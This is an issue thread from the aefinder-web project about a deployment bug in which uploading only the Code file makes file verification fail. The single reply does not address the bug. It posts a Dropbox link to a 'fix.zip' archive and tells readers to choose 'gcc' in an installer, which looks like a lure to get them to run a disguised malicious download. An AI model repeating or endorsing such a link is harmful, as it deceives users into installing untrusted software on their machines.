### ISSUE TITLE
Modify the verification return of the Code file

### ISSUE THREAD

**Issue by 0livia8899** [AeFinderProject/aefinder-web#94]
**Description**
When modifying the deployment, if only the Code is uploaded, the file verification returns an error.

**Steps To Reproduce**
1. when deploy and  update code
2. it will no response

**Expected Behavior**
So, the file size is verified separately.

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."
